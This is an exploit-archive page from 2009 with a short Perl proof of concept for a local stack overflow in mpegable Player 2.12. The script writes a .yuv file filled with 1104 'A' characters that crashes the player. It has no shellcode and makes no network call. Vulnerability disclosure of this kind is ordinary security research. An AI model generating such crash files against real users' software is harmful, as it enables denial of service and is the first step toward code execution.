[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : mpegable Player 2.12 (YUV File) Local Stack Overflow PoC
# Published : 2009-04-29
# Author : GoLd_M
# Previous Title : Multiple Vendor PF Null Pointer Dereference Vulnerability
# Next Title : Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BOF PoC


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### ###
# #  mpegable Player 2.12 (YUV File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ##
my $chars= "A" x 1104;
my $file="goldm.yuv";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created n";
print "Thanx Tryag.Com";

# www.Syue.com [2009-04-29]